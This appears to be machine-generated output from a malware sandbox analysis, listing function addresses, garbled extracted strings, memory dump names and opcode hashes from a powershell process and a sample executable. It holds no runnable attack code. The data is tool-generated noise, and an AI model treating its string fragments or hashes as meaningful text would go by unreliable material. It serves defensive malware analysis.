String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2779274079
Opcode ID: 0e37869e66507d52165528cf3e9e8a21d9320bfdebc4577368ef0fcd3cf581d8
Instruction ID: b7128aa0c10e254e2ced1337c19905663a5c365e8d21c1eef30660937e744296
Opcode Fuzzy Hash: 0e37869e66507d52165528cf3e9e8a21d9320bfdebc4577368ef0fcd3cf581d8
Instruction Fuzzy Hash: CBC1E531B04348DFDB698F28DA046AA77E2AF81735F24D47EE4198B250DB32D946C791

Function 06EC12C8 Relevance: 12.8, Strings: 10, Instructions: 308COMMON

Download Yara Rule

Strings

$^q, xrefs: 06EC15D2
sl, xrefs: 06EC1623
$^q, xrefs: 06EC15A7
$^q, xrefs: 06EC15DE
tP^q, xrefs: 06EC14E4
sl, xrefs: 06EC1615
4'^q, xrefs: 06EC137E
$^q, xrefs: 06EC1454
4'^q, xrefs: 06EC1372
tP^q, xrefs: 06EC14F0

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$sl$sl
API String ID: 0-2468075116
Opcode ID: 7da8581a383006058027468f30853889e5fb9fba4e87085f4588f0fa01f394a4
Instruction ID: c94448bab199df20a8d17898757c6cc42cab2eb3952f3a4576eccdafcba33d78
Opcode Fuzzy Hash: 7da8581a383006058027468f30853889e5fb9fba4e87085f4588f0fa01f394a4
Instruction Fuzzy Hash: AFA14931F043458FDB655B698A047EBBBE6AF81228F19906FD445CB293DA31C847C7A1

Function 08B30498 Relevance: 10.4, Strings: 8, Instructions: 389COMMON

Download Yara Rule

Strings

84{l, xrefs: 08B30665
84{l, xrefs: 08B3066F
tP^q, xrefs: 08B307D4
tP^q, xrefs: 08B307C8
tP^q, xrefs: 08B306B7
84{l, xrefs: 08B30777
tP^q, xrefs: 08B306C3
84{l, xrefs: 08B3076B

Memory Dump Source

Source File: 00000001.00000002.2156268646.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8b30000_powershell.jbxd

Similarity

API ID:
String ID: 84{l$84{l$84{l$84{l$tP^q$tP^q$tP^q$tP^q
API String ID: 0-1026940187
Opcode ID: 9d04c72274fc20876c0bdbbca7bd79d1c96ca39cc1ef5a3a5058110e8ab89c4a
Instruction ID: 340e8b2eacde91b187f995753bd20b7f4890e1c500f242e54e1317dd788f3454
Opcode Fuzzy Hash: 9d04c72274fc20876c0bdbbca7bd79d1c96ca39cc1ef5a3a5058110e8ab89c4a
Instruction Fuzzy Hash: 16D1F431B40214DFCB14EF68D944A6ABBE2EFC4711F1484AEE8069B355DA31ED43CBA1

Function 08B3293A Relevance: 10.3, Strings: 8, Instructions: 324COMMON

Download Yara Rule

Strings

tP^q, xrefs: 08B32B98
tP^q, xrefs: 08B32A83
tP^q, xrefs: 08B32BA4
84{l, xrefs: 08B32A1A
tP^q, xrefs: 08B32A77
84{l, xrefs: 08B32B3B
84{l, xrefs: 08B32A26
84{l, xrefs: 08B32B47

Memory Dump Source

Source File: 00000001.00000002.2156268646.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8b30000_powershell.jbxd

Similarity

API ID:
String ID: 84{l$84{l$84{l$84{l$tP^q$tP^q$tP^q$tP^q
API String ID: 0-1026940187
Opcode ID: 2de18c53a0830d53f24f33ee1667e79a806ce51f05900e5b11ab93565659b178
Instruction ID: 16b0c75dc1b25bd59c7a0c7147e5cc703e9651e86e25b3354eaa4aca53634ac9
Opcode Fuzzy Hash: 2de18c53a0830d53f24f33ee1667e79a806ce51f05900e5b11ab93565659b178
Instruction Fuzzy Hash: FCC19435B00219DFCF249F58D5546AABBE2FF88712F2488A9E9059B350DB31DC46CBE1

Function 06EC5568 Relevance: 10.3, Strings: 8, Instructions: 304COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06EC5682
$^q, xrefs: 06EC57FB
$^q, xrefs: 06EC5624
4'^q, xrefs: 06EC5676
$^q, xrefs: 06EC5618
$^q, xrefs: 06EC5838
$^q, xrefs: 06EC5844
$^q, xrefs: 06EC55BF

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3732357466
Opcode ID: 83c502506c50b5d1a2743a42bd93407499b7e2de6d601398416e14f90a2e80ff
Instruction ID: 2bb509bde05e107a42ba5fdf649738fb6e248dd3a47fd2cd0fe00f6a5a58cc17
Opcode Fuzzy Hash: 83c502506c50b5d1a2743a42bd93407499b7e2de6d601398416e14f90a2e80ff
Instruction Fuzzy Hash: 89A10631E14304DFDB558F29CA446AABBF2EF85224F2884BFD415CB251DB31E866C7A1

Function 06ECDF1C Relevance: 10.2, Strings: 8, Instructions: 161COMMON

Download Yara Rule

Strings

$^q, xrefs: 06ECDFCC
TQcq, xrefs: 06ECE132
$^q, xrefs: 06ECDFAB
4'^q, xrefs: 06ECE18E
84{l, xrefs: 06ECE04C
tP^q, xrefs: 06ECE09E
$^q, xrefs: 06ECE15C
TQcq, xrefs: 06ECDF8A

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$84{l$TQcq$TQcq$tP^q$$^q$$^q$$^q
API String ID: 0-4078397411
Opcode ID: 11aea78c7c682f9233a81bcc3d8e33d2339d7c8b40c3aad90f54ab9d867f52ab
Instruction ID: 033b764eaa6470a2de58b0d691add9085d4fca8e466b1d805e297e71709a78e0
Opcode Fuzzy Hash: 11aea78c7c682f9233a81bcc3d8e33d2339d7c8b40c3aad90f54ab9d867f52ab
Instruction Fuzzy Hash: 8F51A430A00304DFDBA88F09CB057AA77A1BF44735F14A16EE8159B291DB35DD9ACBD1

Function 06EC288B Relevance: 9.0, Strings: 7, Instructions: 208COMMON

Download Yara Rule

Strings

Tmk, xrefs: 06EC2935
4'^q, xrefs: 06EC2969
DUmk, xrefs: 06EC2AE5
XY}l, xrefs: 06EC294F
4'^q, xrefs: 06EC2975
4'^q, xrefs: 06EC2B19
XY}l, xrefs: 06EC2943

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: Tmk$4'^q$4'^q$4'^q$DUmk$XY}l$XY}l
API String ID: 0-2239393233
Opcode ID: 9aa375d1c1af027768f2795ee37a08da21c80d58e2a3a6037c3b3e5cde5b5748
Instruction ID: 6d206434d5c5523460fbc3d107d180dd753789139dc2fb6ce5290590fd1e38be
Opcode Fuzzy Hash: 9aa375d1c1af027768f2795ee37a08da21c80d58e2a3a6037c3b3e5cde5b5748
Instruction Fuzzy Hash: 2C61E531F043058FDBA4CF68C6446AABBF2EF89634F1490AED605DB255D731DA42C7A1

Function 06ECD9E9 Relevance: 8.9, Strings: 7, Instructions: 162COMMON

Download Yara Rule

Strings

tP^q, xrefs: 06ECDBE1
d%dq, xrefs: 06ECDC15
84{l, xrefs: 06ECDB8F
4'^q, xrefs: 06ECDC7F
$^q, xrefs: 06ECDAC8
d%dq, xrefs: 06ECDC0B
d%dq, xrefs: 06ECDBA7

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$84{l$d%dq$d%dq$d%dq$tP^q$$^q
API String ID: 0-589857995
Opcode ID: 32eea729df1bca8d71cf6467075c5fee3f1df93cee68589232c9c8524f5e0f72
Instruction ID: 035001624dd264a42caef949f2a6f04f94240fec5fffc1aa8249700483c9c420
Opcode Fuzzy Hash: 32eea729df1bca8d71cf6467075c5fee3f1df93cee68589232c9c8524f5e0f72
Instruction Fuzzy Hash: 8751E131A003049FDBA48F14CF50BAAB7E6AF84664F19A07DE8019F295D772DD42C7A1

Function 06EC16D0 Relevance: 8.9, Strings: 7, Instructions: 128COMMON

Download Yara Rule

Strings

$^q, xrefs: 06EC1708
sl, xrefs: 06EC17B7
$^q, xrefs: 06EC1714
tP^q, xrefs: 06EC174D
sl, xrefs: 06EC17C5
tP^q, xrefs: 06EC1759
$^q, xrefs: 06EC16E2

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q$$^q$$^q$$^q$sl$sl
API String ID: 0-1772042946
Opcode ID: fe7a49d3f51d908636a7166d3704f4411a015199453e1e0be57a9decfffb642b
Instruction ID: ace257fa398972c15093f513121ed4af483826de06daa7913189c587fea49665
Opcode Fuzzy Hash: fe7a49d3f51d908636a7166d3704f4411a015199453e1e0be57a9decfffb642b
Instruction Fuzzy Hash: 83413D32B083548FD7154B69D904AA6BBE5AFC6674B24815FE444CF3E3CA32DC06C7A1

Function 06EC0AE8 Relevance: 8.9, Strings: 7, Instructions: 123COMMON

Download Yara Rule

Strings

sl, xrefs: 06EC0BCF
sl, xrefs: 06EC0BDD
tP^q, xrefs: 06EC0B65
$^q, xrefs: 06EC0B20
$^q, xrefs: 06EC0B2C
$^q, xrefs: 06EC0AFA
tP^q, xrefs: 06EC0B71

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q$$^q$$^q$$^q$sl$sl
API String ID: 0-1772042946
Opcode ID: 946bbe9d98da354a24411a726243c3b8299f57372f2b2a7dc750c0751edb821d
Instruction ID: 72ad81b5036941ba610e8a86ed9110584ebc6ca361cf0dbc1d6f8508969b3425
Opcode Fuzzy Hash: 946bbe9d98da354a24411a726243c3b8299f57372f2b2a7dc750c0751edb821d
Instruction Fuzzy Hash: 00415A32708354CFD7558B299900566BFF1AFC1638B29859FE445CF3A6CA32CC05C3A1

Function 06EC37C8 Relevance: 8.0, Strings: 6, Instructions: 463COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06EC3A46
4'^q, xrefs: 06EC3A50
4'^q, xrefs: 06EC3CE9
tP^q, xrefs: 06EC3B9C
tP^q, xrefs: 06EC3BA8
4'^q, xrefs: 06EC3CDD

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
API String ID: 0-445857065
Opcode ID: d1b03f1f8cb6b39d1cfd7610b51ab4e6d54426baa93afd3bc97008433313ccb8
Instruction ID: c32406dcd9fb71e4245a16ffa52e94138c2bffdedf1e85c3c902f1195c1621f5
Opcode Fuzzy Hash: d1b03f1f8cb6b39d1cfd7610b51ab4e6d54426baa93afd3bc97008433313ccb8
Instruction Fuzzy Hash: 4CE13932B043458FCB558B699A1166BBBA2AFC1324F18D46ED406CF295DB32D847C7E2

Function 06ECDB2E Relevance: 7.6, Strings: 6, Instructions: 85COMMON

Download Yara Rule

Strings

tP^q, xrefs: 06ECDBE1
d%dq, xrefs: 06ECDC15
84{l, xrefs: 06ECDB8F
4'^q, xrefs: 06ECDC7F
d%dq, xrefs: 06ECDC0B
d%dq, xrefs: 06ECDBA7

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$84{l$d%dq$d%dq$d%dq$tP^q
API String ID: 0-1531352656
Opcode ID: de10e25043da50825e5f26d0dc0616721bdc4187b14139070770f55de7b64812
Instruction ID: f59113405d6be42d3e8fe5417ab2c06795120c3ad1b57e75142d751ba1a21196
Opcode Fuzzy Hash: de10e25043da50825e5f26d0dc0616721bdc4187b14139070770f55de7b64812
Instruction Fuzzy Hash: F4319E70B003149FDB64DF14CA54EAABBE2BF88724F249569E805AF354C772ED42CB90

Function 06EC0538 Relevance: 6.4, Strings: 5, Instructions: 137COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06EC0626
$^q, xrefs: 06EC05C4
4'^q, xrefs: 06EC0632
$^q, xrefs: 06EC05FD
$^q, xrefs: 06EC0609

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: e518ce044e5b8c4118acd9d92e2593275fdcbadbb41a4a0a0426836c1e6aea5c
Instruction ID: 33c7a32c2f18fa833e452f96cd05db0efe2d995b8f2f090129b07959bc95402b
Opcode Fuzzy Hash: e518ce044e5b8c4118acd9d92e2593275fdcbadbb41a4a0a0426836c1e6aea5c
Instruction Fuzzy Hash: D2411431B24305DFDB664F24CA106BA7BA1AFC1224F14846ED905CB791DB33CA87C7A2

Function 06ECAF78 Relevance: 5.4, Strings: 4, Instructions: 398COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06ECB375
4'^q, xrefs: 06ECB419
x.nk, xrefs: 06ECB5F5
-nk, xrefs: 06ECB62C

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$x.nk$-nk
API String ID: 0-3747014097
Opcode ID: beb421d58c1ed9e43eee7bea5d8788e060996a2d9a2e129dfd319bda431ce79a
Instruction ID: 2caa21a2a5aec43a03770d269b8bf58dddaeb495d28d8c9ed8583ea1336710b8
Opcode Fuzzy Hash: beb421d58c1ed9e43eee7bea5d8788e060996a2d9a2e129dfd319bda431ce79a
Instruction Fuzzy Hash: C8023C74A00318DFDB54CF18CA51B9ABBB2BF49304F1185E9D9096B391CB72AD86CF91

Function 06ECF480 Relevance: 5.3, Strings: 4, Instructions: 312COMMON

Download Yara Rule

Strings

(f}l, xrefs: 06ECF6B6
(f}l, xrefs: 06ECF754
(f}l, xrefs: 06ECF74A
(f}l, xrefs: 06ECF6AC

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: (f}l$(f}l$(f}l$(f}l
API String ID: 0-516988632
Opcode ID: eed3aa13f295539fd349f3a05bfe2b43532f3d216379f8e09be8f5fe24398dca
Instruction ID: 9d0126a9d81fb8d6d8cec67047d509166291afa7f329a8f9b6fb38ce055f454b
Opcode Fuzzy Hash: eed3aa13f295539fd349f3a05bfe2b43532f3d216379f8e09be8f5fe24398dca
Instruction Fuzzy Hash: 3BC15E74E003059FDB54CB98C651AAAB7B3AF88328F25D569D805AB754CB32EC42CB91

Function 06EC5E50 Relevance: 5.3, Strings: 4, Instructions: 251COMMON

Download Yara Rule

Strings

84{l, xrefs: 06EC5F35
tP^q, xrefs: 06EC5F82
84{l, xrefs: 06EC5F2B
tP^q, xrefs: 06EC5F8E

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: 84{l$84{l$tP^q$tP^q
API String ID: 0-827238091
Opcode ID: c67e5b3f88033ea6c7d7f4fded20d3ee46294839db8016900ebdaaeb38aa650b
Instruction ID: a37cd4d2c8f830cf3fa13c051079300856c8675867b7d3a946418acfde8ea69b
Opcode Fuzzy Hash: c67e5b3f88033ea6c7d7f4fded20d3ee46294839db8016900ebdaaeb38aa650b
Instruction Fuzzy Hash: C6812731F003449FC7699F688A41A7BBBE2AB84724F28846EE515DF391DB31DC46C7A1

Function 06EC7CE0 Relevance: 5.2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

Strings

(f}l, xrefs: 06EC7E5F
(f}l, xrefs: 06EC7DE1
(f}l, xrefs: 06EC7DD7
(f}l, xrefs: 06EC7E55

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: (f}l$(f}l$(f}l$(f}l
API String ID: 0-516988632
Opcode ID: 640bc874fc79c01c39b9c907054de99689cd136a9ad4eb506f5b72cb92730afd
Instruction ID: aac56915af57404707c6b68334c3964e0af5bf7eb6ebaae9e854d82d7d6a7b0d
Opcode Fuzzy Hash: 640bc874fc79c01c39b9c907054de99689cd136a9ad4eb506f5b72cb92730afd
Instruction Fuzzy Hash: F0715070E002049FDB54CF58CA41AAABBB2AF89324F15916DD8159B355CB72EC42CFA1

Function 06EC36A0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 06EC36CE
$^q, xrefs: 06EC3708
$^q, xrefs: 06EC36FC
$^q, xrefs: 06EC36B2

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 83db13f7285a122c4547e60a9d4003db7a1828150f7a1703935b6e4b2080c05b
Instruction ID: f7a4a1397a381242550418e39160f0af5894f18bdeea79bf44f9ea5533d93a17
Opcode Fuzzy Hash: 83db13f7285a122c4547e60a9d4003db7a1828150f7a1703935b6e4b2080c05b
Instruction Fuzzy Hash: 1F2179317103059BEBA8492A9E00B63B7D69BC0725F24D42EA406CB3D5CD35C842C3A1

Function 06ECA485 Relevance: 5.1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

Strings

$^q, xrefs: 06ECA513
$^q, xrefs: 06ECA4F7
$^q, xrefs: 06ECA557
$^q, xrefs: 06ECA53B

Memory Dump Source

Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 1efc62e258d25480a21a216fbffb49eef7fe9ee1b101419efe4e6af668b440f1
Instruction ID: 507a51ecc89ae6702d40d6da8bc56e4afe686ebae3f2f87a5e95b7bc6568f7b8
Opcode Fuzzy Hash: 1efc62e258d25480a21a216fbffb49eef7fe9ee1b101419efe4e6af668b440f1
Instruction Fuzzy Hash: F2219C31D0430E8FDBB58E9DC6446AABBB5AB80334F18E07ED4059B246DB31884BC7A1

Analysis Process: Beskftigelsesmssiges.exePID: 7852, Parent PID: 7308COMMON

Execution Graph

Execution Coverage:	24%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1332
Total number of Limit Nodes:	0

Executed Functions

Function 001529E0 Relevance: 8.2, Strings: 6, Instructions: 685
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xbq, xrefs: 00152B57
Xbq, xrefs: 00152BA4
Xbq, xrefs: 00153CF6
Xbq, xrefs: 00152AD8
Xbq, xrefs: 00153CCD
Xbq, xrefs: 00152A9E

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq$Xbq$Xbq
API String ID: 0-1317942629
Opcode ID: 86d88a6ba340fa29c0d52cc55c9ad3ace52488aaa054affe64c9d9fb836b576b
Instruction ID: 82110c94bc98c65cb6b41642b6b5e68262806edaf8b0ff65e8ccaa5612f7c391
Opcode Fuzzy Hash: 86d88a6ba340fa29c0d52cc55c9ad3ace52488aaa054affe64c9d9fb836b576b
Instruction Fuzzy Hash: 63325D6684D7D48FCB638B7848E815B7FB16B92205B8945DFC4C78B687DB28C609C362

Function 00155362 Relevance: 6.4, Strings: 5, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 001555D9
LjAp, xrefs: 00155550
0oAp, xrefs: 001553E2
LjAp, xrefs: 00155566
PH^q, xrefs: 001555C8

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 6a46021313cc4854f3c691bbe99847da4a967fc73f3116c80ca84c82e2b01d01
Instruction ID: a411a81d258509ddb848b9716880991adfd61a2d5edd190469ce788db94a2010
Opcode Fuzzy Hash: 6a46021313cc4854f3c691bbe99847da4a967fc73f3116c80ca84c82e2b01d01
Instruction Fuzzy Hash: EA91FA74D00618CFDB18CFA9D894A9DBBF2BF89301F14C069D818AB365DB349985CF10

Function 0015C468 Relevance: 6.4, Strings: 5, Instructions: 191
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 0015C65D
LjAp, xrefs: 0015C647
0oAp, xrefs: 0015C4DA
PH^q, xrefs: 0015C6BF
PH^q, xrefs: 0015C6D0

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: fad296ba00a53a3f1118137d94fbe4ac116f4114c373c5b927848c6b66ec9e3c
Instruction ID: eb2461eed47019ba6dc4d63786c9d1b267a84dde9b8ac37b4310b8076752ff04
Opcode Fuzzy Hash: fad296ba00a53a3f1118137d94fbe4ac116f4114c373c5b927848c6b66ec9e3c
Instruction Fuzzy Hash: B981F974E00218CFDB18DFA9D894A9DBBF2BF88301F14D069E818AB365DB345985CF50

Function 0015D278 Relevance: 6.4, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 0015D46D
0oAp, xrefs: 0015D2EA
PH^q, xrefs: 0015D4E0
LjAp, xrefs: 0015D457
PH^q, xrefs: 0015D4CF

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 5a9f9f489e9abf84fb621de0c3cc2ef1e96be5a0f51f5de8329eb3dba0acbf8f
Instruction ID: b049971a0703ce12fc6562fabf4d0fbbb030039c74902cde349cbc96f2c6afff
Opcode Fuzzy Hash: 5a9f9f489e9abf84fb621de0c3cc2ef1e96be5a0f51f5de8329eb3dba0acbf8f
Instruction Fuzzy Hash: 1181E974E00258CFDB14DFAAD884A9DBBF2BF89301F14C069E818AB365DB349985CF10

Function 0015C19B Relevance: 6.4, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oAp, xrefs: 0015C20A
LjAp, xrefs: 0015C38D
PH^q, xrefs: 0015C400
LjAp, xrefs: 0015C377
PH^q, xrefs: 0015C3EF

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: de38fab46afa01a90064032ec2b36b5c32f4b616b8f452a9f54597737b1bd219
Instruction ID: 5f54aa3bc5bc74be8d848589e83b232ab333eda9e9db3939bb56eaf49565fec0
Opcode Fuzzy Hash: de38fab46afa01a90064032ec2b36b5c32f4b616b8f452a9f54597737b1bd219
Instruction Fuzzy Hash: B281D874E00218CFDB58DFAAD894A9DBBF2BF89301F14C069E818AB365DB349945CF50

Function 0015CA08 Relevance: 6.4, Strings: 5, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 0015CBFD
PH^q, xrefs: 0015CC70
0oAp, xrefs: 0015CA7A
LjAp, xrefs: 0015CBE7
PH^q, xrefs: 0015CC5F

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 3cc33bec737a3448e39c26529fc7b6ccfd71377673a89d46e974f958d9ee3e2c
Instruction ID: 3fae17e79a507cbe47c12a81fda5b2f8b45ef3d5b455dcc2a9218d3d9cd6f24d
Opcode Fuzzy Hash: 3cc33bec737a3448e39c26529fc7b6ccfd71377673a89d46e974f958d9ee3e2c
Instruction Fuzzy Hash: 6D81D974E00218CFDB14DFA9D884A9DBBF2BF89301F14C069E819AB365DB349945CF50

Function 0015CCD8 Relevance: 6.4, Strings: 5, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 0015CF2F
0oAp, xrefs: 0015CD4A
LjAp, xrefs: 0015CEB7
PH^q, xrefs: 0015CF40
LjAp, xrefs: 0015CECD

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 141cc41384bbc918fc636386b024ba501f52b26b8b8cf7a9920e8b485240f353
Instruction ID: dddc18f631f87f20bcddfbecb2b9521728cee665c2a6fff15fa5fb21f779a6e1
Opcode Fuzzy Hash: 141cc41384bbc918fc636386b024ba501f52b26b8b8cf7a9920e8b485240f353
Instruction Fuzzy Hash: 2B81B674E00218DFDB18DFAAD984A9DBBF2BF88301F14D069E819AB365DB345985CF50

Function 0015C738 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 0015C917
PH^q, xrefs: 0015C98F
PH^q, xrefs: 0015C9A0
0oAp, xrefs: 0015C7AA
LjAp, xrefs: 0015C92D

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 31a3fe3f89bde231473982efef29ec63b9c5909ab9c5370d13adab27545608ed
Instruction ID: d75d5a5a282f8f97958e29c12c7c7adb46759c52fb64051e3335fa0b18517c7b
Opcode Fuzzy Hash: 31a3fe3f89bde231473982efef29ec63b9c5909ab9c5370d13adab27545608ed
Instruction Fuzzy Hash: 1581D974E00218CFDB18DFAAD994A9DBBF2BF88305F14D069E818AB365DB345945CF50

Function 0015CFAC Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oAp, xrefs: 0015D01A
PH^q, xrefs: 0015D1FF
